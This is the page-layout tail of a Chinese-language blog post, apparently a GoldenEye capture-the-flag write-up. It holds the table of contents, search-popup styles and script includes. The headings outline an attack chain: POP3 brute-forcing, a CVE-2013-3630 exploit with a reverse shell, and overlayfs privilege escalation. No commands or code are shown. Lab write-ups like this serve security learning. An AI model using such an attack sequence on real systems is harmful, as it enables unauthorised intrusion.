href="#%E8%AE%BF%E9%97%AEsevernaya-station-com-x2F-gnocertdir"><span class="nav-number">2.5.</span> <span class="nav-text">访问severnaya-station.com&#x2F;gnocertdir</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9hosts%E6%96%87%E4%BB%B6"><span class="nav-number">2.5.1.</span> <span class="nav-text">修改hosts文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%99%BB%E5%BD%95%E5%9C%B0%E5%9D%80"><span class="nav-number">2.5.2.</span> <span class="nav-text">登录地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pop3-gt-%E7%88%86%E7%A0%B4%E7%94%A8%E6%88%B7doak"><span class="nav-number">2.5.3.</span> <span class="nav-text">pop3-&gt;爆破用户doak</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#doak%E8%B4%A6%E5%8F%B7"><span class="nav-number">2.5.3.1.</span> <span class="nav-text">doak账号</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dr-doak%E7%99%BB%E5%BD%95website"><span class="nav-number">2.5.4.</span> <span class="nav-text">dr_doak登录website</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#for-007-jpg"><span class="nav-number">2.5.5.</span> <span class="nav-text">for-007.jpg</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-CVE-2013-3630"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用-CVE-2013-3630</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%80%EF%BC%9AMSF"><span class="nav-number">3.1.</span> <span class="nav-text">方式一：MSF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Shell-engine"><span class="nav-number">3.1.1.</span> <span class="nav-text">Shell engine</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#msfconsole"><span class="nav-number">3.1.2.</span> <span class="nav-text">msfconsole</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E5%BC%8F%E4%BA%8C%EF%BC%9A%E6%89%8B%E5%8A%A8%E8%A7%A6%E5%8F%91"><span class="nav-number">3.2.</span> <span class="nav-text">方式二：手动触发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Page-to-aspell"><span class="nav-number">3.2.1.</span> <span class="nav-text">Page to aspell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Toggle-spellchecher"><span class="nav-number">3.2.2.</span> <span class="nav-text">Toggle spellchecher</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%88%90%E5%8A%9F%E5%8F%8D%E5%BC%B9"><span class="nav-number">3.3.</span> <span class="nav-text">成功反弹</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">4.</span> <span class="nav-text">权限提升</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC"><span class="nav-number">4.1.</span> <span class="nav-text">查看内核版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%90%9C%E7%B4%A2%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC%E7%9A%84exp"><span class="nav-number">4.2.</span> <span class="nav-text">搜索内核版本的exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#overlayfs%E6%9C%AC%E5%9C%B0%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-number">4.3.</span> <span class="nav-text">overlayfs本地权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exploits-37292"><span class="nav-number">4.4.</span> <span class="nav-text">exploits-37292</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cat-flag"><span class="nav-number">4.5.</span> <span class="nav-text">cat flag</span></a></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        $icon-size = 1.2rem;

.search-pop-overlay {
  position: fixed;
  display: flex;
  height: 100%;
  width: 100%;
  left: 0;
  top: 0;
  background: rgba(0, 0, 0, 0);
  visibility: hidden;
  z-index: $z-index-8;
  transition-t("visibility, background", "0, 0", "0.3, 0.3", "ease, ease");

  &.active {
    visibility: visible;
    background: rgba(0, 0, 0, 0.35);

    .search-popup {
      transform: scale(1);
    }

  }


  .search-popup {
    background: var(--background-color);
    border-radius: 5px;
    height: 80%;
    width: 70%;
    margin: auto;
    transform: scale(0);
    z-index: $z-index-6;
    transition-t("transform", "0", "0.3", "ease");

    +keep-tablet() {
      width: 80%;
    }

    +keep-mobile() {
      width: 90%;
    }

    .search-header {
      background: var(--fourth-text-color);
      border-top-left-radius: 2px;
      border-top-right-radius: 2px;
      display: flex;
      padding: 10px;

      .search-input-field-pre, .popup-btn-close {
        font-size: $icon-size;
        padding: 0 10px;
        display: flex;
        align-items: center;
      }

      .search-input-field-pre {
        cursor: pointer;
        color: var(--third-text-color);
      }

      .popup-btn-close {
        color: var(--default-text-color);
      }


      .search-input-container {

        flex-grow: 1;
        padding: 2px;

        .search-input {
          background: transparent;
          border: 0;
          outline: 0;
          width: 100%;
          font-size: 1.2rem;
          color: var(--default-text-color);

          &::-webkit-search-cancel-button {
            display: none;
          }
        }


      }


      .popup-btn-close {
        cursor: pointer;

        &:hover .fas, far, fab {
          color: var(--first-text-color);
        }
      }

    }


    #search-result {
      display: flex;
      height: calc(100% - 55px);
      overflow: auto;
      padding: 5px 25px;

      .search-result-list {
        width: 100%;
        height: 100%;
        font-size: 1rem;

        li {
          border-bottom: 1px dashed var(--border-color);
          padding: 10px 0;
          margin: 10px 0;
          box-sizing: border-box;

          &:last-child {
            border-bottom: none;
          }


          .search-result-title {
            position: relative;
            font-weight: bold;
            margin-bottom: 10px;
            padding-left: 16px;
            display: flex;
            align-items: center;

            &::after {
              content: '';
              position: absolute;
              width: 5px;
              height: 5px;
              border-radius: 50%;
              top: 50%;
              transform: translateY(-50%);
              left: 0;
              background: var(--default-text-color);
            }
          }


          .search-result {
            line-height: 2rem;
            margin: 0;
            padding-left: 16px;
            word-wrap: break-word;
          }

          a {
            &:hover {
              color: var(--default-text-color);
            }
          }

          .search-keyword {
            border-bottom: 1px dashed var(--primary-color);
            color: var(--primary-color);
            font-weight: bold;
          }

        }
      }


      #no-result {
        color: var(--third-text-color);
        margin: auto;
      }

    }
  }
}


    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>



    
<script src="/js/local-search.js"></script>




    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
